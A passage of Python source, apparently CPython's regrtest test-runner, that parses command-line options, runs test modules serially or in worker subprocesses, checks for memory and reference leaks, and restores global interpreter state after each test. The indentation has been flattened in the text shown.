# happens before the chdir). All the modules imported after the chdir, are
# not found in the CWD, and since the other paths in sys.path[1:] are absolute
# (site.py absolutize them), the __file__ and __path__ will be absolute too.
# Therefore it is necessary to absolutize manually the __file__ and __path__ of
# the packages to prevent later imports to fail when the CWD is different.
for module in sys.modules.values():
if hasattr(module, '__path__'):
module.__path__ = [os.path.abspath(path) for path in module.__path__]
if hasattr(module, '__file__'):
module.__file__ = os.path.abspath(module.__file__)
# MacOSX (a.k.a. Darwin) has a default stack size that is too small
# for deeply recursive regular expressions. We see this as crashes in
# the Python test suite when running test_re.py and test_sre.py. The
# fix is to set the stack limit to 2048.
# This approach may also be useful for other Unixy platforms that
# suffer from small default stack limits.
if sys.platform == 'darwin':
try:
import resource
except ImportError:
pass
else:
soft, hard = resource.getrlimit(resource.RLIMIT_STACK)
newsoft = min(hard, max(soft, 1024*2048))
resource.setrlimit(resource.RLIMIT_STACK, (newsoft, hard))
# Test result constants.
PASSED = 1
FAILED = 0
ENV_CHANGED = -1
SKIPPED = -2
RESOURCE_DENIED = -3
INTERRUPTED = -4
CHILD_ERROR = -5 # error in a child process
from test import support
RESOURCE_NAMES = ('audio', 'curses', 'largefile', 'network',
'decimal', 'cpu', 'subprocess', 'urlfetch', 'gui')
# When tests are run from the Python build directory, it is best practice
# to keep the test files in a subfolder. This eases the cleanup of leftover
# files using the "make distclean" command.
if sysconfig.is_python_build():
TEMPDIR = os.path.join(sysconfig.get_config_var('srcdir'), 'build')
else:
TEMPDIR = tempfile.gettempdir()
TEMPDIR = os.path.abspath(TEMPDIR)
class _ArgParser(argparse.ArgumentParser):
def error(self, message):
super().error(message + "\nPass -h or --help for complete help.")
def _create_parser():
# Set prog to prevent the uninformative "__main__.py" from displaying in
# error messages when using "python -m test ...".
parser = _ArgParser(prog='regrtest.py',
usage=USAGE,
description=DESCRIPTION,
epilog=EPILOG,
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter)
# Arguments with this clause added to its help are described further in
# the epilog's "Additional option details" section.
more_details = ' See the section at bottom for more details.'
group = parser.add_argument_group('General options')
# We add help explicitly to control what argument group it renders under.
group.add_argument('-h', '--help', action='help',
help='show this help message and exit')
group.add_argument('--timeout', metavar='TIMEOUT', type=float,
help='dump the traceback and exit if a test takes '
'more than TIMEOUT seconds; disabled if TIMEOUT '
'is negative or equals to zero')
group.add_argument('--wait', action='store_true',
help='wait for user input, e.g., allow a debugger '
'to be attached')
group.add_argument('--slaveargs', metavar='ARGS')
group.add_argument('-S', '--start', metavar='START',
help='the name of the test at which to start.' +
more_details)
group = parser.add_argument_group('Verbosity')
group.add_argument('-v', '--verbose', action='count',
help='run tests in verbose mode with output to stdout')
group.add_argument('-w', '--verbose2', action='store_true',
help='re-run failed tests in verbose mode')
group.add_argument('-W', '--verbose3', action='store_true',
help='display test output on failure')
group.add_argument('-q', '--quiet', action='store_true',
help='no output unless one or more tests fail')
group.add_argument('-o', '--slow', action='store_true', dest='print_slow',
help='print the slowest 10 tests')
group.add_argument('--header', action='store_true',
help='print header with interpreter info')
group = parser.add_argument_group('Selecting tests')
group.add_argument('-r', '--randomize', action='store_true',
help='randomize test execution order.' + more_details)
group.add_argument('--randseed', metavar='SEED',
dest='random_seed', type=int,
help='pass a random seed to reproduce a previous '
'random run')
group.add_argument('-f', '--fromfile', metavar='FILE',
help='read names of tests to run from a file.' +
more_details)
group.add_argument('-x', '--exclude', action='store_true',
help='arguments are tests to *exclude*')
group.add_argument('-s', '--single', action='store_true',
help='single step through a set of tests.' +
more_details)
group.add_argument('-m', '--match', metavar='PAT',
dest='match_tests',
help='match test cases and methods with glob pattern PAT')
group.add_argument('-G', '--failfast', action='store_true',
help='fail as soon as a test fails (only with -v or -W)')
group.add_argument('-u', '--use', metavar='RES1,RES2,...',
action='append', type=resources_list,
help='specify which special resource intensive tests '
'to run.' + more_details)
group.add_argument('-M', '--memlimit', metavar='LIMIT',
help='run very large memory-consuming tests.' +
more_details)
group.add_argument('--testdir', metavar='DIR',
type=relative_filename,
help='execute test files in the specified directory '
'(instead of the Python stdlib test suite)')
group = parser.add_argument_group('Special runs')
group.add_argument('-l', '--findleaks', action='store_true',
help='if GC is available detect tests that leak memory')
group.add_argument('-L', '--runleaks', action='store_true',
help='run the leaks(1) command just before exit.' +
more_details)
group.add_argument('-R', '--huntrleaks', metavar='RUNCOUNTS',
type=huntrleaks,
help='search for reference leaks (needs debug build, '
'very slow).' + more_details)
group.add_argument('-j', '--multiprocess', metavar='PROCESSES',
dest='use_mp', type=int,
help='run PROCESSES processes at once')
group.add_argument('-T', '--coverage', action='store_true',
dest='trace',
help='turn on code coverage tracing using the trace '
'module')
group.add_argument('-D', '--coverdir', metavar='DIR',
type=relative_filename,
help='directory where coverage files are put')
group.add_argument('-N', '--nocoverdir',
action='store_const', const=None, dest='coverdir',
help='put coverage files alongside modules')
group.add_argument('-t', '--threshold', metavar='THRESHOLD',
type=int,
help='call gc.set_threshold(THRESHOLD)')
group.add_argument('-n', '--nowindows', action='store_true',
help='suppress error message boxes on Windows')
group.add_argument('-F', '--forever', action='store_true',
help='run the specified tests in a loop, until an '
'error happens')
parser.add_argument('args', nargs=argparse.REMAINDER,
help=argparse.SUPPRESS)
return parser
def relative_filename(string):
# CWD is replaced with a temporary dir before calling main(), so we
# join it with the saved CWD so it ends up where the user expects.
return os.path.join(support.SAVEDCWD, string)
def huntrleaks(string):
args = string.split(':')
if len(args) not in (2, 3):
raise argparse.ArgumentTypeError(
'needs 2 or 3 colon-separated arguments')
nwarmup = int(args[0]) if args[0] else 5
ntracked = int(args[1]) if args[1] else 4
fname = args[2] if len(args) > 2 and args[2] else 'reflog.txt'
return nwarmup, ntracked, fname
def resources_list(string):
u = [x.lower() for x in string.split(',')]
for r in u:
if r == 'all' or r == 'none':
continue
if r[0] == '-':
r = r[1:]
if r not in RESOURCE_NAMES:
raise argparse.ArgumentTypeError('invalid resource: ' + r)
return u
def _parse_args(args, **kwargs):
# Defaults
ns = argparse.Namespace(testdir=None, verbose=0, quiet=False,
exclude=False, single=False, randomize=False, fromfile=None,
findleaks=False, use_resources=None, trace=False, coverdir='coverage',
runleaks=False, huntrleaks=False, verbose2=False, print_slow=False,
random_seed=None, use_mp=None, verbose3=False, forever=False,
header=False, failfast=False, match_tests=None)
for k, v in kwargs.items():
if not hasattr(ns, k):
raise TypeError('%r is an invalid keyword argument '
'for this function' % k)
setattr(ns, k, v)
if ns.use_resources is None:
ns.use_resources = []
parser = _create_parser()
parser.parse_args(args=args, namespace=ns)
if ns.single and ns.fromfile:
parser.error("-s and -f don't go together!")
if ns.use_mp and ns.trace:
parser.error("-T and -j don't go together!")
if ns.use_mp and ns.findleaks:
parser.error("-l and -j don't go together!")
if ns.use_mp and ns.memlimit:
parser.error("-M and -j don't go together!")
if ns.failfast and not (ns.verbose or ns.verbose3):
parser.error("-G/--failfast needs either -v or -W")
if ns.quiet:
ns.verbose = 0
if ns.timeout is not None:
if hasattr(faulthandler, 'dump_traceback_later'):
if ns.timeout <= 0:
ns.timeout = None
else:
print("Warning: The timeout option requires "
"faulthandler.dump_traceback_later")
ns.timeout = None
if ns.use_mp is not None:
if ns.use_mp <= 0:
# Use all cores + extras for tests that like to sleep
ns.use_mp = 2 + (os.cpu_count() or 1)
if ns.use_mp == 1:
ns.use_mp = None
if ns.use:
for a in ns.use:
for r in a:
if r == 'all':
ns.use_resources[:] = RESOURCE_NAMES
continue
if r == 'none':
del ns.use_resources[:]
continue
remove = False
if r[0] == '-':
remove = True
r = r[1:]
if remove:
if r in ns.use_resources:
ns.use_resources.remove(r)
elif r not in ns.use_resources:
ns.use_resources.append(r)
if ns.random_seed is not None:
ns.randomize = True
return ns
def run_test_in_subprocess(testname, ns):
"""Run the given test in a subprocess with --slaveargs.
ns is the option Namespace parsed from command-line arguments. regrtest
is invoked in a subprocess with the --slaveargs argument; when the
subprocess exits, its return code, stdout and stderr are returned as a
3-tuple.
"""
from subprocess import Popen, PIPE
base_cmd = ([sys.executable] + support.args_from_interpreter_flags() +
['-X', 'faulthandler', '-m', 'test.regrtest'])
slaveargs = (
(testname, ns.verbose, ns.quiet),
dict(huntrleaks=ns.huntrleaks,
use_resources=ns.use_resources,
output_on_failure=ns.verbose3,
timeout=ns.timeout, failfast=ns.failfast,
match_tests=ns.match_tests))
# Running the child from the same working directory as regrtest's original
# invocation ensures that TEMPDIR for the child is the same when
# sysconfig.is_python_build() is true. See issue 15300.
popen = Popen(base_cmd + ['--slaveargs', json.dumps(slaveargs)],
stdout=PIPE, stderr=PIPE,
universal_newlines=True,
close_fds=(os.name != 'nt'),
cwd=support.SAVEDCWD)
stdout, stderr = popen.communicate()
retcode = popen.wait()
return retcode, stdout, stderr
def main(tests=None, **kwargs):
"""Execute a test suite.
This also parses command-line options and modifies its behavior
accordingly.
tests -- a list of strings containing test names (optional)
testdir -- the directory in which to look for tests (optional)
Users other than the Python test suite will certainly want to
specify testdir; if it's omitted, the directory containing the
Python test suite is searched for.
If the tests argument is omitted, the tests listed on the
command-line will be used. If that's empty, too, then all *.py
files beginning with test_ will be used.
The other default arguments (verbose, quiet, exclude,
single, randomize, findleaks, use_resources, trace, coverdir,
print_slow, and random_seed) allow programmers calling main()
directly to set the values that would normally be set by flags
on the command line.
"""
# Display the Python traceback on fatal errors (e.g. segfault)
faulthandler.enable(all_threads=True)
# Display the Python traceback on SIGALRM or SIGUSR1 signal
signals = []
if hasattr(signal, 'SIGALRM'):
signals.append(signal.SIGALRM)
if hasattr(signal, 'SIGUSR1'):
signals.append(signal.SIGUSR1)
for signum in signals:
faulthandler.register(signum, chain=True)
replace_stdout()
support.record_original_stdout(sys.stdout)
ns = _parse_args(sys.argv[1:], **kwargs)
if ns.huntrleaks:
# Avoid false positives due to various caches
# filling slowly with random data:
warm_caches()
if ns.memlimit is not None:
support.set_memlimit(ns.memlimit)
if ns.threshold is not None:
import gc
gc.set_threshold(ns.threshold)
if ns.nowindows:
import msvcrt
msvcrt.SetErrorMode(msvcrt.SEM_FAILCRITICALERRORS|
msvcrt.SEM_NOALIGNMENTFAULTEXCEPT|
msvcrt.SEM_NOGPFAULTERRORBOX|
msvcrt.SEM_NOOPENFILEERRORBOX)
try:
msvcrt.CrtSetReportMode
except AttributeError:
# release build
pass
else:
for m in [msvcrt.CRT_WARN, msvcrt.CRT_ERROR, msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(m, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(m, msvcrt.CRTDBG_FILE_STDERR)
if ns.wait:
input("Press any key to continue...")
if ns.slaveargs is not None:
args, kwargs = json.loads(ns.slaveargs)
if kwargs.get('huntrleaks'):
unittest.BaseTestSuite._cleanup = False
try:
result = runtest(*args, **kwargs)
except KeyboardInterrupt:
result = INTERRUPTED, ''
except BaseException as e:
traceback.print_exc()
result = CHILD_ERROR, str(e)
sys.stdout.flush()
print() # Force a newline (just in case)
print(json.dumps(result))
sys.exit(0)
good = []
bad = []
skipped = []
resource_denieds = []
environment_changed = []
interrupted = False
if ns.findleaks:
try:
import gc
except ImportError:
print('No GC available, disabling findleaks.')
ns.findleaks = False
else:
# Uncomment the line below to report garbage that is not
# freeable by reference counting alone. By default only
# garbage that is not collectable by the GC is reported.
#gc.set_debug(gc.DEBUG_SAVEALL)
found_garbage = []
if ns.huntrleaks:
unittest.BaseTestSuite._cleanup = False
if ns.single:
filename = os.path.join(TEMPDIR, 'pynexttest')
try:
with open(filename, 'r') as fp:
next_test = fp.read().strip()
tests = [next_test]
except OSError:
pass
if ns.fromfile:
tests = []
with open(os.path.join(support.SAVEDCWD, ns.fromfile)) as fp:
count_pat = re.compile(r'\[\s*\d+/\s*\d+\]')
for line in fp:
line = count_pat.sub('', line)
guts = line.split() # assuming no test has whitespace in its name
if guts and not guts[0].startswith('#'):
tests.extend(guts)
# Strip .py extensions.
removepy(ns.args)
removepy(tests)
stdtests = STDTESTS[:]
nottests = NOTTESTS.copy()
if ns.exclude:
for arg in ns.args:
if arg in stdtests:
stdtests.remove(arg)
nottests.add(arg)
ns.args = []
# For a partial run, we do not need to clutter the output.
if ns.verbose or ns.header or not (ns.quiet or ns.single or tests or ns.args):
# Print basic platform information
print("==", platform.python_implementation(), *sys.version.split())
print("== ", platform.platform(aliased=True),
"%s-endian" % sys.byteorder)
print("== ", "hash algorithm:", sys.hash_info.algorithm,
"64bit" if sys.maxsize > 2**32 else "32bit")
print("== ", os.getcwd())
print("Testing with flags:", sys.flags)
# if testdir is set, then we are not running the python tests suite, so
# don't add default tests to be executed or skipped (pass empty values)
if ns.testdir:
alltests = findtests(ns.testdir, list(), set())
else:
alltests = findtests(ns.testdir, stdtests, nottests)
selected = tests or ns.args or alltests
if ns.single:
selected = selected[:1]
try:
next_single_test = alltests[alltests.index(selected[0])+1]
except IndexError:
next_single_test = None
# Remove all the selected tests that precede start if it's set.
if ns.start:
try:
del selected[:selected.index(ns.start)]
except ValueError:
print("Couldn't find starting test (%s), using all tests" % ns.start)
if ns.randomize:
if ns.random_seed is None:
ns.random_seed = random.randrange(10000000)
random.seed(ns.random_seed)
print("Using random seed", ns.random_seed)
random.shuffle(selected)
if ns.trace:
import trace, tempfile
tracer = trace.Trace(ignoredirs=[sys.base_prefix, sys.base_exec_prefix,
tempfile.gettempdir()],
trace=False, count=True)
test_times = []
support.verbose = ns.verbose # Tell tests to be moderately quiet
support.use_resources = ns.use_resources
save_modules = sys.modules.keys()
def accumulate_result(test, result):
ok, test_time = result
test_times.append((test_time, test))
if ok == PASSED:
good.append(test)
elif ok == FAILED:
bad.append(test)
elif ok == ENV_CHANGED:
environment_changed.append(test)
elif ok == SKIPPED:
skipped.append(test)
elif ok == RESOURCE_DENIED:
skipped.append(test)
resource_denieds.append(test)
if ns.forever:
def test_forever(tests=list(selected)):
while True:
for test in tests:
yield test
if bad:
return
tests = test_forever()
test_count = ''
test_count_width = 3
else:
tests = iter(selected)
test_count = '/{}'.format(len(selected))
test_count_width = len(test_count) - 1
if ns.use_mp:
try:
from threading import Thread
except ImportError:
print("Multiprocess option requires thread support")
sys.exit(2)
from queue import Queue
debug_output_pat = re.compile(r"\[\d+ refs, \d+ blocks\]$")
output = Queue()
pending = MultiprocessTests(tests)
def work():
# A worker thread.
try:
while True:
try:
test = next(pending)
except StopIteration:
output.put((None, None, None, None))
return
retcode, stdout, stderr = run_test_in_subprocess(test, ns)
# Strip last refcount output line if it exists, since it
# comes from the shutdown of the interpreter in the subcommand.
stderr = debug_output_pat.sub("", stderr)
stdout, _, result = stdout.strip().rpartition("\n")
if retcode != 0:
result = (CHILD_ERROR, "Exit code %s" % retcode)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
return
if not result:
output.put((None, None, None, None))
return
result = json.loads(result)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
except BaseException:
output.put((None, None, None, None))
raise
workers = [Thread(target=work) for i in range(ns.use_mp)]
for worker in workers:
worker.start()
finished = 0
test_index = 1
try:
while finished < ns.use_mp:
test, stdout, stderr, result = output.get()
if test is None:
finished += 1
continue
accumulate_result(test, result)
if not ns.quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count,
len(bad), test))
if stdout:
print(stdout)
if stderr:
print(stderr, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
if result[0] == INTERRUPTED:
raise KeyboardInterrupt
if result[0] == CHILD_ERROR:
raise Exception("Child error on {}: {}".format(test, result[1]))
test_index += 1
except KeyboardInterrupt:
interrupted = True
pending.interrupted = True
for worker in workers:
worker.join()
else:
for test_index, test in enumerate(tests, 1):
if not ns.quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count, len(bad), test))
sys.stdout.flush()
if ns.trace:
# If we're tracing code coverage, then we don't exit with status
# if on a false return value from main.
tracer.runctx('runtest(test, ns.verbose, ns.quiet, timeout=ns.timeout)',
globals=globals(), locals=vars())
else:
try:
result = runtest(test, ns.verbose, ns.quiet,
ns.huntrleaks,
output_on_failure=ns.verbose3,
timeout=ns.timeout, failfast=ns.failfast,
match_tests=ns.match_tests)
accumulate_result(test, result)
except KeyboardInterrupt:
interrupted = True
break
if ns.findleaks:
gc.collect()
if gc.garbage:
print("Warning: test created", len(gc.garbage), end=' ')
print("uncollectable object(s).")
# move the uncollectable objects somewhere so we don't see
# them again
found_garbage.extend(gc.garbage)
del gc.garbage[:]
# Unload the newly imported modules (best effort finalization)
for module in sys.modules.keys():
if module not in save_modules and module.startswith("test."):
support.unload(module)
if interrupted:
# print a newline after ^C
print()
print("Test suite interrupted by signal SIGINT.")
omitted = set(selected) - set(good) - set(bad) - set(skipped)
print(count(len(omitted), "test"), "omitted:")
printlist(omitted)
if good and not ns.quiet:
if not bad and not skipped and not interrupted and len(good) > 1:
print("All", end=' ')
print(count(len(good), "test"), "OK.")
if ns.print_slow:
test_times.sort(reverse=True)
print("10 slowest tests:")
for time, test in test_times[:10]:
print("%s: %.1fs" % (test, time))
if bad:
print(count(len(bad), "test"), "failed:")
printlist(bad)
if environment_changed:
print("{} altered the execution environment:".format(
count(len(environment_changed), "test")))
printlist(environment_changed)
if skipped and not ns.quiet:
print(count(len(skipped), "test"), "skipped:")
printlist(skipped)
if ns.verbose2 and bad:
print("Re-running failed tests in verbose mode")
for test in bad[:]:
print("Re-running test %r in verbose mode" % test)
sys.stdout.flush()
try:
ns.verbose = True
ok = runtest(test, True, ns.quiet, ns.huntrleaks,
timeout=ns.timeout)
except KeyboardInterrupt:
# print a newline separate from the ^C
print()
break
else:
if ok[0] in {PASSED, ENV_CHANGED, SKIPPED, RESOURCE_DENIED}:
bad.remove(test)
else:
if bad:
print(count(len(bad), 'test'), "failed again:")
printlist(bad)
if ns.single:
if next_single_test:
with open(filename, 'w') as fp:
fp.write(next_single_test + '\n')
else:
os.unlink(filename)
if ns.trace:
r = tracer.results()
r.write_results(show_missing=True, summary=True, coverdir=ns.coverdir)
if ns.runleaks:
os.system("leaks %d" % os.getpid())
sys.exit(len(bad) > 0 or interrupted)
# small set of tests to determine if we have a basically functioning interpreter
# (i.e. if any of these fail, then anything else is likely to follow)
STDTESTS = [
'test_grammar',
'test_opcodes',
'test_dict',
'test_builtin',
'test_exceptions',
'test_types',
'test_unittest',
'test_doctest',
'test_doctest2',
'test_support'
]
# set of tests that we don't want to be executed when using regrtest
NOTTESTS = set()
def findtests(testdir=None, stdtests=STDTESTS, nottests=NOTTESTS):
"""Return a list of all applicable test modules."""
testdir = findtestdir(testdir)
names = os.listdir(testdir)
tests = []
others = set(stdtests) | nottests
for name in names:
mod, ext = os.path.splitext(name)
if mod[:5] == "test_" and ext in (".py", "") and mod not in others:
tests.append(mod)
return stdtests + sorted(tests)
# We do not use a generator so multiple threads can call next().
class MultiprocessTests(object):
"""A thread-safe iterator over tests for multiprocess mode."""
def __init__(self, tests):
self.interrupted = False
self.lock = threading.Lock()
self.tests = tests
def __iter__(self):
return self
def __next__(self):
with self.lock:
if self.interrupted:
raise StopIteration('tests interrupted')
return next(self.tests)
def replace_stdout():
"""Set stdout encoder error handler to backslashreplace (as stderr error
handler) to avoid UnicodeEncodeError when printing a traceback"""
import atexit
stdout = sys.stdout
sys.stdout = open(stdout.fileno(), 'w',
encoding=stdout.encoding,
errors="backslashreplace",
closefd=False,
newline='\n')
def restore_stdout():
sys.stdout.close()
sys.stdout = stdout
atexit.register(restore_stdout)
def runtest(test, verbose, quiet,
huntrleaks=False, use_resources=None,
output_on_failure=False, failfast=False, match_tests=None,
timeout=None):
"""Run a single test.
test -- the name of the test
verbose -- if true, print more messages
quiet -- if true, don't print 'skipped' messages (probably redundant)
huntrleaks -- run multiple times to test for leaks; requires a debug
build; a triple corresponding to -R's three arguments
use_resources -- list of extra resources to use
output_on_failure -- if true, display test output on failure
timeout -- dump the traceback and exit if a test takes more than
timeout seconds
failfast, match_tests -- See regrtest command-line flags for these.
Returns the tuple result, test_time, where result is one of the constants:
INTERRUPTED KeyboardInterrupt when run under -j
RESOURCE_DENIED test skipped because resource denied
SKIPPED test skipped for some other reason
ENV_CHANGED test failed because it changed the execution environment
FAILED test failed
PASSED test passed
"""
if use_resources is not None:
support.use_resources = use_resources
use_timeout = (timeout is not None)
if use_timeout:
faulthandler.dump_traceback_later(timeout, exit=True)
try:
support.match_tests = match_tests
if failfast:
support.failfast = True
if output_on_failure:
support.verbose = True
# Reuse the same instance to all calls to runtest(). Some
# tests keep a reference to sys.stdout or sys.stderr
# (eg. test_argparse).
if runtest.stringio is None:
stream = io.StringIO()
runtest.stringio = stream
else:
stream = runtest.stringio
stream.seek(0)
stream.truncate()
orig_stdout = sys.stdout
orig_stderr = sys.stderr
try:
sys.stdout = stream
sys.stderr = stream
result = runtest_inner(test, verbose, quiet, huntrleaks,
display_failure=False)
if result[0] == FAILED:
output = stream.getvalue()
orig_stderr.write(output)
orig_stderr.flush()
finally:
sys.stdout = orig_stdout
sys.stderr = orig_stderr
else:
support.verbose = verbose # Tell tests to be moderately quiet
result = runtest_inner(test, verbose, quiet, huntrleaks,
display_failure=not verbose)
return result
finally:
if use_timeout:
faulthandler.cancel_dump_traceback_later()
cleanup_test_droppings(test, verbose)
runtest.stringio = None
# Unit tests are supposed to leave the execution environment unchanged
# once they complete. But sometimes tests have bugs, especially when
# tests fail, and the changes to environment go on to mess up other
# tests. This can cause issues with buildbot stability, since tests
# are run in random order and so problems may appear to come and go.
# There are a few things we can save and restore to mitigate this, and
# the following context manager handles this task.
class saved_test_environment:
"""Save bits of the test environment and restore them at block exit.
with saved_test_environment(testname, verbose, quiet):
#stuff
Unless quiet is True, a warning is printed to stderr if any of
the saved items was changed by the test. The attribute 'changed'
is initially False, but is set to True if a change is detected.
If verbose is more than 1, the before and after state of changed
items is also printed.
"""
changed = False
def __init__(self, testname, verbose=0, quiet=False):
self.testname = testname
self.verbose = verbose
self.quiet = quiet
# To add things to save and restore, add a name XXX to the resources list
# and add corresponding get_XXX/restore_XXX functions. get_XXX should
# return the value to be saved and compared against a second call to the
# get function when test execution completes. restore_XXX should accept
# the saved value and restore the resource using it. It will be called if
# and only if a change in the value is detected.
#
# Note: XXX will have any '.' replaced with '_' characters when determining
# the corresponding method names.
resources = ('sys.argv', 'cwd', 'sys.stdin', 'sys.stdout', 'sys.stderr',
'os.environ', 'sys.path', 'sys.path_hooks', '__import__',
'warnings.filters', 'asyncore.socket_map',
'logging._handlers', 'logging._handlerList', 'sys.gettrace',
'sys.warnoptions',
# multiprocessing.process._cleanup() may release ref
# to a thread, so check processes first.
'multiprocessing.process._dangling', 'threading._dangling',
'sysconfig._CONFIG_VARS', 'sysconfig._INSTALL_SCHEMES',
'files', 'locale', 'warnings.showwarning',
)
def get_sys_argv(self):
return id(sys.argv), sys.argv, sys.argv[:]
def restore_sys_argv(self, saved_argv):
sys.argv = saved_argv[1]
sys.argv[:] = saved_argv[2]
def get_cwd(self):
return os.getcwd()
def restore_cwd(self, saved_cwd):
os.chdir(saved_cwd)
def get_sys_stdout(self):
return sys.stdout
def restore_sys_stdout(self, saved_stdout):
sys.stdout = saved_stdout
def get_sys_stderr(self):
return sys.stderr
def restore_sys_stderr(self, saved_stderr):
sys.stderr = saved_stderr
def get_sys_stdin(self):
return sys.stdin
def restore_sys_stdin(self, saved_stdin):
sys.stdin = saved_stdin
def get_os_environ(self):
return id(os.environ), os.environ, dict(os.environ)
def restore_os_environ(self, saved_environ):
os.environ = saved_environ[1]
os.environ.clear()
os.environ.update(saved_environ[2])
def get_sys_path(self):
return id(sys.path), sys.path, sys.path[:]
def restore_sys_path(self, saved_path):
sys.path = saved_path[1]
sys.path[:] = saved_path[2]
def get_sys_path_hooks(self):
return id(sys.path_hooks), sys.path_hooks, sys.path_hooks[:]
def restore_sys_path_hooks(self, saved_hooks):
sys.path_hooks = saved_hooks[1]
sys.path_hooks[:] = saved_hooks[2]
def get_sys_gettrace(self):
return sys.gettrace()
def restore_sys_gettrace(self, trace_fxn):
sys.settrace(trace_fxn)
def get___import__(self):
return builtins.__import__
def restore___import__(self, import_):
builtins.__import__ = import_
def get_warnings_filters(self):
return id(warnings.filters), warnings.filters, warnings.filters[:]
def restore_warnings_filters(self, saved_filters):
warnings.filters = saved_filters[1]
warnings.filters[:] = saved_filters[2]
def get_asyncore_socket_map(self):
asyncore = sys.modules.get('asyncore')
# XXX Making a copy keeps objects alive until __exit__ gets called.
return asyncore and asyncore.socket_map.copy() or {}
def restore_asyncore_socket_map(self, saved_map):
asyncore = sys.modules.get('asyncore')
if asyncore is not None:
asyncore.close_all(ignore_all=True)
asyncore.socket_map.update(saved_map)
def get_shutil_archive_formats(self):
# we could call get_archives_formats() but that only returns the
# registry keys; we want to check the values too (the functions that
# are registered)
return shutil._ARCHIVE_FORMATS, shutil._ARCHIVE_FORMATS.copy()
def restore_shutil_archive_formats(self, saved):
shutil._ARCHIVE_FORMATS = saved[0]
shutil._ARCHIVE_FORMATS.clear()
shutil._ARCHIVE_FORMATS.update(saved[1])
def get_shutil_unpack_formats(self):
return shutil._UNPACK_FORMATS, shutil._UNPACK_FORMATS.copy()
def restore_shutil_unpack_formats(self, saved):
shutil._UNPACK_FORMATS = saved[0]
shutil._UNPACK_FORMATS.clear()
shutil._UNPACK_FORMATS.update(saved[1])
def get_logging__handlers(self):
# _handlers is a WeakValueDictionary
return id(logging._handlers), logging._handlers, logging._handlers.copy()
def restore_logging__handlers(self, saved_handlers):
# Can't easily revert the logging state
pass
def get_logging__handlerList(self):
# _handlerList is a list of weakrefs to handlers
return id(logging._handlerList), logging._handlerList, logging._handlerList[:]
def restore_logging__handlerList(self, saved_handlerList):
# Can't easily revert the logging state
pass
def get_sys_warnoptions(self):
return id(sys.warnoptions), sys.warnoptions, sys.warnoptions[:]
def restore_sys_warnoptions(self, saved_options):
sys.warnoptions = saved_options[1]
sys.warnoptions[:] = saved_options[2]
# Controlling dangling references to Thread objects can make it easier
# to track reference leaks.
def get_threading__dangling(self):
if not threading:
return None
# This copies the weakrefs without making any strong reference
return threading._dangling.copy()
def restore_threading__dangling(self, saved):
if not threading:
return
threading._dangling.clear()
threading._dangling.update(saved)
# Same for Process objects
def get_multiprocessing_process__dangling(self):
if not multiprocessing:
return None
# Unjoined process objects can survive after process exits
multiprocessing.process._cleanup()
# This copies the weakrefs without making any strong reference
return multiprocessing.process._dangling.copy()
def restore_multiprocessing_process__dangling(self, saved):
if not multiprocessing:
return
multiprocessing.process._dangling.clear()
multiprocessing.process._dangling.update(saved)
def get_sysconfig__CONFIG_VARS(self):
# make sure the dict is initialized
sysconfig.get_config_var('prefix')
return (id(sysconfig._CONFIG_VARS), sysconfig._CONFIG_VARS,
dict(sysconfig._CONFIG_VARS))
def restore_sysconfig__CONFIG_VARS(self, saved):
sysconfig._CONFIG_VARS = saved[1]
sysconfig._CONFIG_VARS.clear()
sysconfig._CONFIG_VARS.update(saved[2])
def get_sysconfig__INSTALL_SCHEMES(self):
return (id(sysconfig._INSTALL_SCHEMES), sysconfig._INSTALL_SCHEMES,
sysconfig._INSTALL_SCHEMES.copy())
def restore_sysconfig__INSTALL_SCHEMES(self, saved):
sysconfig._INSTALL_SCHEMES = saved[1]
sysconfig._INSTALL_SCHEMES.clear()
sysconfig._INSTALL_SCHEMES.update(saved[2])
def get_files(self):
return sorted(fn + ('/' if os.path.isdir(fn) else '')
for fn in os.listdir())
def restore_files(self, saved_value):
fn = support.TESTFN
if fn not in saved_value and (fn + '/') not in saved_value:
if os.path.isfile(fn):
support.unlink(fn)
elif os.path.isdir(fn):
support.rmtree(fn)
_lc = [getattr(locale, lc) for lc in dir(locale)
if lc.startswith('LC_')]
def get_locale(self):
pairings = []
for lc in self._lc:
try:
pairings.append((lc, locale.setlocale(lc, None)))
except (TypeError, ValueError):
continue
return pairings
def restore_locale(self, saved):
for lc, setting in saved:
locale.setlocale(lc, setting)
def get_warnings_showwarning(self):
return warnings.showwarning
def restore_warnings_showwarning(self, fxn):
warnings.showwarning = fxn
def resource_info(self):
for name in self.resources:
method_suffix = name.replace('.', '_')
get_name = 'get_' + method_suffix
restore_name = 'restore_' + method_suffix
yield name, getattr(self, get_name), getattr(self, restore_name)
def __enter__(self):
self.saved_values = dict((name, get()) for name, get, restore
in self.resource_info())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
saved_values = self.saved_values
del self.saved_values
for name, get, restore in self.resource_info():
current = get()
original = saved_values.pop(name)
# Check for changes to the resource's value
if current != original:
self.changed = True
restore(original)
if not self.quiet:
print("Warning -- {} was modified by {}".format(
name, self.testname),
file=sys.stderr)
if self.verbose > 1:
print(" Before: {}\n After: {} ".format(
original, current),
file=sys.stderr)
return False
def runtest_inner(test, verbose, quiet,
huntrleaks=False, display_failure=True):
support.unload(test)
test_time = 0.0
refleak = False # True if the test leaked references.
try:
if test.startswith('test.'):
abstest = test
else:
# Always import it from the test package
abstest = 'test.' + test
with saved_test_environment(test, verbose, quiet) as environment:
start_time = time.time()
the_module = importlib.import_module(abstest)
# If the test has a test_main, that will run the appropriate
# tests. If not, use normal unittest test loading.
test_runner = getattr(the_module, "test_main", None)
if test_runner is None:
def test_runner():
loader = unittest.TestLoader()
tests = loader.loadTestsFromModule(the_module)
for error in loader.errors:
print(error, file=sys.stderr)
if loader.errors:
raise Exception("errors while loading tests")
support.run_unittest(tests)
test_runner()
if huntrleaks:
refleak = dash_R(the_module, test, test_runner, huntrleaks)
test_time = time.time() - start_time
except support.ResourceDenied as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return RESOURCE_DENIED, test_time
